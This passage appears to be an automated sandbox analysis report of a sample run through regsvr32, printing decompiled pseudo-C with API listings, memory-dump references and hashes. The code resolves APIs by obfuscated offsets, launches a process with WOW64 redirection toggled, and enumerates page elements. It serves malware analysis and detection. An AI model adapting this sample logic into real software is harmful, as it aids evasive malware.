				if(_t43 == 0 && ( *0xfba2b8 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t50 =  *0xfba2d4; // 0x477d5a8
					_t18 = _t50 + 0xfbb4a3; // 0x73797325
					_t52 = E00FB6343(_t18);
					_v12 = _t52;
					if(_t52 == 0) {
						_v8 = 8;
					} else {
						_t53 =  *0xfba2d4; // 0x477d5a8
						_t20 = _t53 + 0xfbb770; // 0x5738d18
						_t21 = _t53 + 0xfbb0af; // 0x4e52454b
						_t66 = GetProcAddress(GetModuleHandleA(_t21), _t20);
						if(_t66 == 0) {
							_v8 = 0x7f;
						} else {
							_t73 = __imp__;
							_v108 = 0x44;
							 *_t73(0);
							_t61 =  *_t66(0, _v12, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32);
							 *_t73(1);
							if(_t61 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0xfba290, 0, _v12);
					}
				}
				_t76 = _v16;
				 *((intOrPtr*)(_t76 + 0x18))( *((intOrPtr*)(_t76 + 0x1c))( *_t76));
				E00FB50CA(_t76);
				goto L12;
			}

0x00fb51b1
0x00fb51b1
0x00fb51bf
0x00fb51c8
0x00fb51cb
0x00fb52dd
0x00fb52e4
0x00fb52e4
0x00fb51da
0x00fb51e2
0x00fb51e7
0x00fb51ea
0x00fb51ff
0x00fb5205
0x00fb5206
0x00fb5209
0x00fb520f
0x00fb5212
0x00fb5217
0x00fb521f
0x00fb5226
0x00fb522d
0x00fb5230
0x00fb52c4
0x00fb5236
0x00fb5236
0x00fb523b
0x00fb5242
0x00fb5256
0x00fb525a
0x00fb52ab
0x00fb525c
0x00fb525c
0x00fb5263
0x00fb526a
0x00fb5282
0x00fb5288
0x00fb528c
0x00fb52a6
0x00fb528e
0x00fb5297
0x00fb529c
0x00fb529c
0x00fb528c
0x00fb52bc
0x00fb52bc
0x00fb5230
0x00fb52cb
0x00fb52d4
0x00fb52d8
0x00000000

APIs

Part of subcall function 00FB4F5A: GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FB51C4,?,?,?,?,00000000,00000000), ref: 00FB4F7F
Part of subcall function 00FB4F5A: GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FB4FA1
Part of subcall function 00FB4F5A: GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FB4FB7
Part of subcall function 00FB4F5A: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FB4FCD
Part of subcall function 00FB4F5A: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FB4FE3
Part of subcall function 00FB4F5A: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FB4FF9

memset.NTDLL ref: 00FB5212

Part of subcall function 00FB6343: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00FB522B,73797325), ref: 00FB6354
Part of subcall function 00FB6343: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00FB636E

GetModuleHandleA.KERNEL32(4E52454B,05738D18,73797325), ref: 00FB5249
GetProcAddress.KERNEL32(00000000), ref: 00FB5250
Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00FB526A
Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00FB5288
CloseHandle.KERNEL32(00000000), ref: 00FB5297
CloseHandle.KERNEL32(?), ref: 00FB529C
GetLastError.KERNEL32 ref: 00FB52A0
HeapFree.KERNEL32(00000000,?), ref: 00FB52BC

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleWow64$CloseEnableEnvironmentExpandModuleRedirectionStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 91923200-0
Opcode ID: e5f240e67ff50e97d4af6e588c422c60dc3de0c7b10b0a23766047fd57fbaf3b
Instruction ID: a6870fd43d0f61ae2fb8ba4ecb55bc9fe430ba939725c43031ac4e5f1e323612
Opcode Fuzzy Hash: e5f240e67ff50e97d4af6e588c422c60dc3de0c7b10b0a23766047fd57fbaf3b
Instruction Fuzzy Hash: DE316776901619EFCB11ABE5CC88ADEBFB8FF08750F204151E605E3121D779AA45EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4F5A, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB4F5A(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E00FB6837(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0xfba2d4; // 0x477d5a8
					_t1 = _t23 + 0xfbb11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0xfba2d4; // 0x477d5a8
					_t2 = _t26 + 0xfbb792; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E00FB50CA(_t54);
					} else {
						_t30 =  *0xfba2d4; // 0x477d5a8
						_t5 = _t30 + 0xfbb77f; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0xfba2d4; // 0x477d5a8
							_t7 = _t33 + 0xfbb74e; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0xfba2d4; // 0x477d5a8
								_t9 = _t36 + 0xfbb72e; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0xfba2d4; // 0x477d5a8
									_t11 = _t39 + 0xfbb7a2; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E00FB4248(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x00fb4f69
0x00fb4f6d
0x00fb502f
0x00fb4f73
0x00fb4f73
0x00fb4f78
0x00fb4f8b
0x00fb4f8d
0x00fb4f92
0x00fb4f9a
0x00fb4fa1
0x00fb4fa5
0x00fb4fa8
0x00fb5027
0x00fb5028
0x00fb4faa
0x00fb4faa
0x00fb4faf
0x00fb4fb7
0x00fb4fbb
0x00fb4fbe
0x00000000
0x00fb4fc0
0x00fb4fc0
0x00fb4fc5
0x00fb4fcd
0x00fb4fd1
0x00fb4fd4
0x00000000
0x00fb4fd6
0x00fb4fd6
0x00fb4fdb
0x00fb4fe3
0x00fb4fe7
0x00fb4fea
0x00000000
0x00fb4fec
0x00fb4fec
0x00fb4ff1
0x00fb4ff9
0x00fb4ffd
0x00fb5000
0x00000000
0x00fb5002
0x00fb5008
0x00fb500d
0x00fb5014
0x00fb501b
0x00fb501e
0x00000000
0x00fb5020
0x00fb5023
0x00fb5023
0x00fb501e
0x00fb5000
0x00fb4fea
0x00fb4fd4
0x00fb4fbe
0x00fb4fa8
0x00fb503d

APIs

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

GetModuleHandleA.KERNEL32(4C44544E,00000020,74183966,00000000,00000000,?,?,?,00FB51C4,?,?,?,?,00000000,00000000), ref: 00FB4F7F
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00FB4FA1
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00FB4FB7
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00FB4FCD
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00FB4FE3
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00FB4FF9

Part of subcall function 00FB4248: memset.NTDLL ref: 00FB42C7

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 87a90bd68d535bc314ff47d98a51baf784c404ce28b99461716daa1adc4d50ac
Instruction ID: d6f2543f12b732883a383fbbbceed069b17a58ae7319af5e4964becfc1858bc8
Opcode Fuzzy Hash: 87a90bd68d535bc314ff47d98a51baf784c404ce28b99461716daa1adc4d50ac
Instruction Fuzzy Hash: AC2162B160064BAFDB10EF6ADD84EA677ECEF08794B004155E509C7211D77AE901EF70

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2A23, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00FB2A23(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E00FB6837(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E00FB50CA(_v16);
								goto L37;
							}
							_t103 = E00FB6837((_v8 + _v8 + 5) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0xfba2cc = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}

0x00fb2a2a
0x00fb2a31
0x00fb2a36
0x00fb2a39
0x00fb2a40
0x00fb2a43
0x00fb2a46
0x00fb2a4d
0x00fb2a50
0x00fb2ba4
0x00fb2ba6
0x00fb2ba8
0x00fb2bad
0x00fb2bad
0x00fb2a56
0x00fb2a59
0x00fb2a5c
0x00fb2a5e
0x00fb2a5e
0x00fb2a62
0x00000000
0x00000000
0x00fb2a66
0x00fb2a92
0x00fb2a97
0x00fb2a99
0x00fb2a99
0x00fb2a9c
0x00fb2a9f
0x00fb2a9f
0x00fb2aa1
0x00000000
0x00fb2a6c
0x00fb2a6e
0x00fb2a8d
0x00fb2a8d
0x00fb2aa4
0x00fb2aa4
0x00fb2aa5
0x00fb2aa5
0x00fb2aa8
0x00000000
0x00000000
0x00000000
0x00fb2aa8
0x00fb2a72
0x00fb2ab9
0x00fb2abd
0x00fb2b97
0x00fb2b99
0x00fb2b99
0x00fb2b9a
0x00fb2b9d
0x00000000
0x00fb2b9d
0x00fb2ad7
0x00fb2adb
0x00fb2b93
0x00000000
0x00fb2b93
0x00fb2ae1
0x00fb2ae4
0x00fb2ae8
0x00fb2aee
0x00fb2af1
0x00fb2b89
0x00fb2b89
0x00000000
0x00fb2b8f
0x00fb2afc
0x00fb2b05
0x00fb2b19
0x00fb2b20
0x00fb2b35
0x00fb2b3b
0x00fb2b43
0x00000000
0x00000000
0x00000000
0x00000000
0x00fb2b45
0x00fb2b45
0x00fb2b45
0x00fb2b4c
0x00fb2b54
0x00000000
0x00000000
0x00fb2b56
0x00fb2b5f
0x00000000
0x00000000
0x00000000
0x00fb2b61
0x00fb2b63
0x00fb2b66
0x00fb2b66
0x00fb2b69
0x00fb2b6d
0x00fb2b70
0x00fb2b76
0x00fb2b79
0x00fb2b80
0x00000000
0x00fb2afc
0x00fb2a77
0x00fb2a82
0x00fb2a85
0x00fb2a87
0x00fb2a87
0x00fb2a8a
0x00fb2a8c
0x00000000
0x00fb2a8c
0x00fb2a66
0x00fb2aac
0x00fb2ab1
0x00fb2ab3
0x00fb2ab3
0x00fb2ab6
0x00fb2ab6
0x00000000

APIs

Part of subcall function 00FB6837: RtlAllocateHeap.NTDLL(00000000,00000000,00FB4197), ref: 00FB6843

lstrcpy.KERNEL32(63699BC4,00000020), ref: 00FB2B20
lstrcat.KERNEL32(63699BC4,00000020), ref: 00FB2B35
lstrcmp.KERNEL32(00000000,63699BC4), ref: 00FB2B4C
lstrlen.KERNEL32(63699BC4), ref: 00FB2B70

Strings

, xrefs: 00FB2AB9

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: a06bffe4e8bd7159814ac244fa2d1ac73a0f1cd5b977db46ae040dd36d8cce74
Instruction ID: 146f25b60f130a01b0ed23b9617ca8cacfcaec43757cd08ba887558ddb78fe8a
Opcode Fuzzy Hash: a06bffe4e8bd7159814ac244fa2d1ac73a0f1cd5b977db46ae040dd36d8cce74
Instruction Fuzzy Hash: 50517F31E00108ABDF61DF9AC984AEDBBB9FF85360F15805AE8159B211C7749A41EF80

Uniqueness

Uniqueness Score: -1.00%

Function 00FB4C1B, Relevance: 7.5, APIs: 5, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00FB4C1B(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0xfba2c4 = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 <= 5) {
					_t5 = 0x32;
					return _t5;
				}
				 *0xfba2b4 = _t4;
				_t6 = GetCurrentProcessId();
				 *0xfba2b0 = _t6;
				 *0xfba2bc = _a4;
				_t7 = OpenProcess(0x10047a, 0, _t6);
				 *0xfba2ac = _t7;
				if(_t7 == 0) {
					 *0xfba2ac =  *0xfba2ac | 0xffffffff;
				}
				return 0;
			}

0x00fb4c23
0x00fb4c2b
0x00fb4c30
0x00000000
0x00fb4c7d
0x00fb4c32
0x00fb4c3a
0x00fb4c7a
0x00000000
0x00fb4c7a
0x00fb4c3c
0x00fb4c41
0x00fb4c53
0x00fb4c58
0x00fb4c5e
0x00fb4c66
0x00fb4c6b
0x00fb4c6d
0x00fb4c6d
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00FB6B4E,?,?,00000001), ref: 00FB4C23
GetVersion.KERNEL32(?,00000001), ref: 00FB4C32
GetCurrentProcessId.KERNEL32(?,00000001), ref: 00FB4C41
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 00FB4C5E
GetLastError.KERNEL32(?,00000001), ref: 00FB4C7D

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 93bfdc37452f680eef092f821bcd356d6a4c12e4888b55a67d2c60e23ff773ff
Instruction ID: 123c3424d372c11cebde342fc24f826cdac7c1e62d75d231f8f1bf54f202c05d
Opcode Fuzzy Hash: 93bfdc37452f680eef092f821bcd356d6a4c12e4888b55a67d2c60e23ff773ff
Instruction Fuzzy Hash: C7F030B4A4A3099FD710AF75AD89B553F74A708B90F504719E646C52F0D7B15400FF1A

Uniqueness

Uniqueness Score: -1.00%

Function 00FB6C6D, Relevance: 6.2, APIs: 4, Instructions: 152
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00FB6C6D(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0xfba2d4; // 0x477d5a8
					_t5 = _t102 + 0xfbb038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0xfb92b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0xfba2d4; // 0x477d5a8
												_t28 = _t108 + 0xfbb0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0xfba2d4; // 0x477d5a8
														_t33 = _t78 + 0xfbb078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}

0x00fb6c72
0x00fb6c7b
0x00fb6c7c
0x00fb6c80
0x00fb6c86
0x00fb6c8c
0x00fb6c95
0x00fb6c9b
0x00fb6ca5
0x00fb6ca7
0x00fb6cad
0x00fb6cb2
0x00fb6cbd
0x00fb6cc5
0x00fb6cc8
0x00fb6deb
0x00fb6cce
0x00fb6cce
0x00fb6cdb
0x00fb6ce1
0x00fb6ce7
0x00fb6ceb
0x00fb6cf1
0x00fb6cfe
0x00fb6d02
0x00fb6d08
0x00fb6d0b
0x00fb6d11
0x00fb6d17
0x00fb6d1d
0x00fb6d20
0x00fb6d23
0x00fb6d29
0x00fb6d32
0x00fb6d38
0x00fb6d39
0x00fb6d3c
0x00fb6d3d
0x00fb6d3e
0x00fb6d46
0x00fb6d47
0x00fb6d48
0x00fb6d4a
0x00fb6d4e
0x00fb6d52
0x00000000
0x00000000
0x00fb6d58
0x00fb6d61
0x00fb6d67
0x00fb6d71
0x00fb6d75
0x00fb6d77
0x00fb6d84
0x00fb6d88
0x00fb6d90
0x00fb6d95
0x00fb6da7
0x00fb6da9
0x00fb6daf
0x00fb6daf
0x00fb6db8
0x00fb6db8
0x00fb6dba
0x00fb6dc0
0x00fb6dc0
0x00fb6dc3
0x00fb6dc9
0x00fb6dcc
0x00fb6dd5
0x00000000
0x00000000
0x00000000
0x00fb6dd5
0x00fb6d29
0x00fb6d23
0x00fb6d0b
0x00fb6ddb
0x00fb6ddb
0x00fb6de1
0x00fb6de1
0x00fb6de7
0x00fb6de7
0x00fb6df0
0x00fb6df6
0x00fb6df6
0x00fb6cb2
0x00fb6dff

APIs

SysAllocString.OLEAUT32(00FB92B0), ref: 00FB6CBD
lstrcmpW.KERNEL32(00000000,0076006F), ref: 00FB6D9F
SysFreeString.OLEAUT32(00000000), ref: 00FB6DB8
SysFreeString.OLEAUT32(?), ref: 00FB6DE7

Memory Dump Source

Source File: 00000013.00000002.582912304.0000000000FB1000.00000020.00000001.sdmp, Offset: 00FB0000, based on PE: true

Associated: 00000013.00000002.582869993.0000000000FB0000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.582969975.0000000000FB9000.00000002.00000001.sdmp Download File
Associated: 00000013.00000002.583008145.0000000000FBA000.00000004.00000001.sdmp Download File
Associated: 00000013.00000002.583050936.0000000000FBC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_fb0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloclstrcmp
String ID:
API String ID: 1885612795-0
Opcode ID: 62452667b66bb939a53461240e9dc017600bf0afe5be461a442f406a4bfc89d8
Instruction ID: 9ec7a229c5b715931db4fb9f814663f5e6a3bfaef0406fcae520931cdc4e9fe2
Opcode Fuzzy Hash: 62452667b66bb939a53461240e9dc017600bf0afe5be461a442f406a4bfc89d8
Instruction Fuzzy Hash: AD515B75E0051AEFCB00DFA9C8889EEB7B9FF88304B144698E915EB214D775AD01DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FB5D93, Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FB5D93(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v156;
				void _v428;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E00FB28F1(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E00FB1000(_t79,  &_v428);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E00FB3915(_t101,  &_v428, _a8, _t96 - _t81);
					E00FB3915(_t79,  &_v156, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
					_t66 = E00FB1000(_t101, 0xfba188);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E00FB1000(_a16, _a4);
						E00FB3B6F(_t79,  &_v428, _a4, _t97);
						memset( &_v428, 0, 0x10c);
						_t55 = memset( &_v156, 0, 0x84);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L00FB7D8C();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L00FB7D86();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0x1a8;
						_a12 = _t74;
						_t76 = E00FB679F(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v156;
							if(E00FB5AC5(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E00FB4A54(_t79,  &_v156, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0xfba188 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x00fb5d96
0x00fb5da2
0x00fb5da8
0x00fb5dad
0x00fb5db1
0x00fb5f23
0x00fb5f27
0x00fb5f27
0x00fb5db7
0x00fb5dbb
